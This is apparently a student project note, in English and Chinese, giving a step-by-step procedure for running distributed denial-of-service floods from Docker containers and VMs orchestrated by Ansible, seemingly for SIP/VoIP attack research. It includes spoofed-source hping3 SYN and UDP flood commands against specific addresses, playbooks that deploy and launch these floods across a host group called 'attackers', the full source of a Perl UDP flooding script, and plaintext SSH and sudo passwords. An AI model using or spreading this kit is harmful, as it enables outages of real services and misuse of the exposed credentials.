--- tags: Project --- [toc] # SOP of DDoS via Docker/VM ## via Docker - [docker commands](https://docs.docker.com/engine/reference/commandline/docker/) - [Docker 筆記 Part 2 ｜指令操作](https://medium.com/@VisonLi/docker-%E5%85%A5%E9%96%80-%E7%AD%86%E8%A8%98-part-2-91e4dfa2b365) - [Type of DDoS attack via hping3](https://www.slideshare.net/Himani-Singh/type-of-ddos-attacks-with-hping3-example) ### Basic Config - Pull the image ``` docker pull ubuntu:latest ``` > same as ==docker pull registry.hub.docker.com/ubuntu:latest== - Edit the image ``` docker run --name test -it ubuntu docker run -t -i ubuntu /bin/bash # apt-get update # apt-get install sudo # apt-get install vim # apt-get install hping3 ``` ``` docker commit -m "Added Git package" -a "Starter" 88400ddfbf99 ubuntu:v2 ``` > -m 後面附帶commit的說明訊息 -a 可以附加作者的資訊 剩下附帶參數分別是container id以及tag - Run a container ``` docker run --name mycontainer -it ubuntu /bin/bash ``` - Detach from a container without stopping it ```ctl-p + ctl-q``` - 匯入與匯出Container ``` docker export 243c32535da7 > ubuntu.tar ``` > 將容器存成本機檔案 ``` docker import ubuntu.tar - ubuntu:v3.5 ``` > 將容器匯入為image #### Set ip address to single container - First you need to create your own docker network (mynet123) ``` docker network create --subnet=172.18.0.0/16 mynet123 ``` - Then, simply run the image (take ubuntu as example) ``` docker run --net mynet123 --ip 172.18.0.22 -it ubuntu bash ``` - make container enable to use ip a command ``` apt install -y iproute2 ``` ## via ansible ### SOP #### Install module ```bash= sudo apt-get install -y software-properties-common sudo add-apt-repository -y ppa:ansible/ansible; sudo apt-get update sudo apt-get install -y ansible sshpass ``` #### Config file - /etc/hosts ``` 172.24.4.93 attacker1 172.24.4.150 attacker2 172.24.4.164 attacker3 172.24.4.166 attacker4 172.24.4.173 attacker5 ``` - /etc/ansible.cfg ``` host_key_checking = False ``` - Inventory.ini ``` [attackers] localhost ansible_connection=local ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3 attacker2 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3 attacker3 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3 attacker4 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3 attacker5 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3 ``` - playbook.yaml ```yaml= - hosts: attackers connection: ssh name: play_download tasks: - name: apt-get update & upgrade become: yes become_method: sudo apt: update_cache: yes upgrade: yes tags: up - name: install hping3 become: yes become_method: sudo apt: name: hping3 tags: attack-module - name: start attack become: yes become_method: sudo command: sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.79 --flood | sudo hping3 -p 5060 -S -a 10.21.22.164 192.168.35.79 --flood tags: attack ``` - multiple commands usage ```yaml= command: "{{item}}" with_items: - sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.79 --flood - sudo hping3 -p 5060 -S -a 10.21.22.164 192.168.35.79 --flood tags: attack ``` ### DDoS tools #### hping3 - [Quick start for hping3](http://wiki.hping.org/94) - [External tutorials and articles](http://wiki.hping.org/33) - [hping man page](http://www.hping.org/manpage.html) - TCP SYN Flooding ```bash= sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.241 -i u1000 sudo hping3 -p 5060 -S -a 10.21.22.164 192.168.35.241 --flood ``` - UDP Flooding ```bash= hping3 -c 5000 -d 150 --udp -p 5060 --flood 10.21.21.25 hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114 hping3 -c 5000 -d 80 --udp -p 7090 --flood 10.21.22.197 ``` #### udp/.pl - UDP Flooding ```bash= perl udp.pl <ip> <port> <time> ``` ```perl= #!/usr/bin/perl #udp.pl by PRG oldTeam use Socket; $ARGC=@ARGV; if ($ARGC !=3) { printf "$0 <ip> <port> <time>\n"; printf "For mote info visit #database/ \n"; exit(1); } my ($ip,$port,$size,$time); $ip=$ARGV[0]; $port=$ARGV[1]; $time=$ARGV[2]; socket(crazy, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$ip"); printf "\e[1;32m********************************************\n"; printf "\e[1;31mFlooding ip -> $ip port -> $port \n\n"; printf "\e[1;37m#database udp \n"; printf "\e[1;32m********************************************\n"; if ($ARGV[1] ==0 && $ARGV[2] ==0) { goto randpackets; } if ($ARGV[1] !=0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 perl) &"); goto packets; } if ($ARGV[1] !=0 && $ARGV[2] ==0) { goto packets; } if ($ARGV[1] ==0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 perl) &"); goto randpackets; } packets: for (;;) { $size=$rand x $rand x $rand; send(crazy, 0, $size, sockaddr_in($port, $iaddr)); } randpackets: for (;;) { $size=$rand x $rand x $rand; $port=int(rand 65000) +1; send(crazy, 0, $size, sockaddr_in($port, $iaddr)); } ``` ## Other config file in master - play-perl.yaml ```yaml= - hosts: attackers connection: ssh name: play_download tasks: - name: apt-get update & upgrade become: yes become_method: sudo apt: update_cache: yes upgrade: yes # force_apt_get: yes # cache_valid_time: 86400 #One day tags: up - name: create a directory if not exist file: path: ~/flooding state: directory tags: mkdir - name: Fetch the file from the attacker1 to master run_once: yes fetch: src: ~/udp.pl dest: ~/flooding/ flat: yes when: "{{ inventory_hostname == 'ansible_node_attacker1' }}" tags: fetch - name: Copy the file from master to other attackers copy: src: ~/flooding/udp.pl dest: ~/flooding/ tags: copy - name: attack command: cd flooding command: perl udp.pl #IPaddr 5060 100 tags: attack ``` ### Problems - 在 DevStack 中建立多台 VM 作為攻擊 cluster 的成效不彰 - 推測原因為 Devstack 虛擬網路中所建之 VM 效能沒有外部的 VM 好(且越多台越分散 Devstack 資源) ``` sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.79 --flood & sleep 20s; sudo kill $! ssh ubuntu@192.168.32.149 ``` ### Related Research > [how to write related research](https://wordvice.com.tw/%E5%A6%82%E4%BD%95%E5%AF%AB%E6%96%87%E7%8D%BB%E6%8E%A2%E8%A8%8E%E6%96%87%E7%8D%BB%E7%A0%94%E7%A9%B6literature-review/) - [The Simulation for the SIP DDoS Attack](https://ieeexplore.ieee.org/document/5331555) - [The Simulation for the VoIP DDoS Attack](https://ieeexplore.ieee.org/document/5089114) - [SIP Flooding Attack Detection with a Multi-Dimensional Sketch Design](https://ieeexplore.ieee.org/document/6720187)